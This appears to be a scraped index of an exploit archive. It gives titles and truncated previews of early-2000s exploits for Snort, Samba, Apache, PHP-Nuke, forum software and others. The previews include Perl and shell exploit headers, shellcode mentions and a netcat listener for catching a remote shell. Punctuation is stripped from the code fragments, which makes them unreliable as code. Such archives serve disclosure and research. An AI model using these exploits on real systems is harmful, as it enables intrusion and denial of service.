Aborior Encore Web Forum - Arbitrary Command Execution

Aborior Encore Web Forum - Arbitrary Command Execution source: https://www.securityfocus.com/bid/10040/info Encore Web Forum is reported prone to an issue that may allow a remote user to execute arbitrary commands on a system implementing the forum software. This issue is due to the application's...

XMB Forum 1.8 - BBcode align Tag Cross-Site Scripting

XMB Forum 1.8 - BBcode align Tag Cross-Site Scripting source: https://www.securityfocus.com/bid/9726/info XMB Forum has been reported prone to multiple cross-site scripting, HTML injection and SQL injection vulnerabilities. The issues present themselves due to insufficient sanitization of remote...

Web Crossing Web Server 4.0/5.0 Component - Remote Denial of Service

source: https://www.securityfocus.com/bid/9576/info The Web Crossing Web Server component has been reported prone to a remote denial of service vulnerability. It has been reported that the issue will present itself when the affected web server receives a malicious HTTP request that contains...

Microsoft Windows XP2003 - Samba Share Resource Exhaustion (Denial of Service)

Microsoft Windows XP2003 - Samba Share Resource Exhaustion Denial of Service !/bin/sh winblast v3 - DoS on WinXP, Win2003Srv 2003-12-04 Steve Ladjabi I've encountered a strange problem mounting a Windows server share. My setup: Debian Linux, smbmount 3.0.0beta2 and Windows 2003 Server. When the...

showexp.txt

Wait For 8 Seconds... setTimeout function showHelp"mk:@MSITStore:iexplore.chm::..\..\..\..\program files\winamp\skins\xvulnx.wsz::\self-exec.html"; , 8000 ;...

PHP-NUKE version <= 6.9 'cid' sql injection Remote Exploit

No description provided by source. !/usr/bin/perl -w use IO::Socket; THIS CODE PUBLIC NOW = \ \ / | \ | / | / / \ | | \ | /\ \ / || /// | / / / / based on 'cid' sql injection vuln in Download module, more info about this vuln u can see here: http://rst.void.ru/texts/advisory10.htm work only...

DSR-wmapm.sh

/bin/sh Pretty useless, we can mess up /etc/dumpdates or run shutdown on FreeBSD systems with wmapm from ports. If wmapm is installed from source we get root instead, so I suppose this might be worth somethinguid 0 on linux. kokanin@dtors pkginfo | grep -i wmapm wmapm-3.1 Laptop battery status...

Apache Tomcat 4.0.x - Non-HTTP Request Denial of Service

Apache Tomcat 4.0.x - Non-HTTP Request Denial of Service source: https://www.securityfocus.com/bid/8824/info Apache Tomcat 4 has been reported prone to a remotely triggered denial-of-service vulnerability when handling undisclosed non-HTTP request types. When certain non-HTTP request types are...

Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (perl)

Exploit for linux platform in category remote exploits the debian openssl issue leads that there are only 65.536 possible ssh keys generated, cause the only entropy is the pid of the process generating the key. This leads to that the following perl script can be used with the precalculated ssh ke...

GNU CFEngine 2.-2.0.3 - Remote Stack Overflow

!/usr/bin/perl -s kokaninATdtors.net / cfengine2-2.0.3 from freebsd ports 26/sep/2003. forking portbind shellcode port=0xb0ef45295 by eSDee bug discovered by nick cleaton, tested on FreeBSD 4.8-RELEASE use IO::Socket; if!$ARGV1 print "usage: ./DSR-cfengine.pl default cfengine is 5308\n"; exit-1;...

[Full-Disclosure] MS03-039 - Exploit ...

from nessus lol The script code starts here function dcomrecvsocket localvar buf, len; buf = recvsocket:socket, length:10; ifstrlenbuf != 10return NULL; len = ordbuf8; len += ordbuf9256; buf += recvsocket:socket, length:len - 10; return buf; port = 135; if!getportstateportport = 593; else soc =...

Apache 2.0.45 - APR Crash

Apache 2.0.45 - APR Crash !/usr/bin/perl Apache 2.0.37 - 2.0.45 APR Exploit Written By Matthew Murphy This Perl script will successfully exploit any un-patched Apache 2.x servers. Base64 Encoder If you want authentication with the server via HTTP's lame Basic auth, put the proper string to encode...

Buffer overflow in ArgoSoft FTP Server

Product: ArGoSOft FTP Server Version: 1.22 other ? OffSite: http://www.argosoft.com/ Problem: Remote buffer overflow -------------------------------------------------------------- ArGoSOft FTP Server - FTP server for Windows. He is exposed to attack. The server does not process the input data...

Webfroot Shoutbox 2.32 - 'Expanded.php' Remote Command Execution

source: https://www.securityfocus.com/bid/7772/info Shoutbox is prone to an issue that may result in the execution of attacker-supplied code. The vulnerability exists due to insufficient sanitization of input into the expanded.php script...

Snitz Forums 3.3.03 - Remote Command Execution

Snitz Forums 3.3.03 - Remote Command Execution !/usr/bin/perl use Socket; print "\nRemote command execution against Snitz Forums 3.3.03 and probably others.\n"; print "You accept full responsibility for your actions by using this script.\n"; print "INTERNAL USE ONLY!! DO NOT DISTRIBUTE!!\n"; prin...

Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution

!/bin/sh p7snort191.sh by truff [email protected] Snort 1.9.1 and below remote exploit Tested on Slackware 8.0 with Snort 1.9.1 from sources Usage: 1/ Launch a listening netcat to listen for the shell nc -p 45295 -l 2/ p7snort119.sh yourIP RetAddr Where yourIP is the IP where the netcat is...

Snort 1.9.1 - p7snort191.sh Remote Command Execution

Snort 1.9.1 - p7snort191.sh Remote Command Execution !/bin/sh p7snort191.sh by truff [email protected] Snort 1.9.1 and below remote exploit Tested on Slackware 8.0 with Snort 1.9.1 from sources Usage: 1/ Launch a listening netcat to listen for the shell nc -p 45295 -l 2/ p7snort119.sh yourIP...

Xeneo Web Server 2.2.9.0 - Denial of Service

!/usr/bin/perl Xeneo Web Server DoS Vulnerable systems: Xeneo. Web Server 2.2.9.0 Written by badpack3t For SP Research Labs 04/21/2003 www.security-protocols.com usage: perl sp-xeneo.pl use IO::Socket; use strict; print ".:."x 20; print "\nXeneo Web Server 2.2.9.0 DoS, \n"; print ".:."x 20; print...

Xeneo Web Server 2.2.9.0 Denial of Service Exploit

Exploit for unknown platform in category dos / poc ================================================== Xeneo Web Server 2.2.9.0 Denial of Service Exploit ================================================== !/usr/bin/perl Xeneo Web Server DoS Vulnerable systems: Xeneo. Web Server 2.2.9.0 Written by...

Samba 2.2.x - Remote Buffer Overflow

Samba 2.2.x - Remote Buffer Overflow !/usr/bin/perl Header Name: trans2root.pl Purpose: Proof of concept exploit for Samba 2.2.x trans2open overflow Author: H D Moore Copyright: Copyright C 2003 Digital Defense Inc. trans2root.pl -t -H -h use strict; use Socket; use IO::Socket; use IO::Select; us...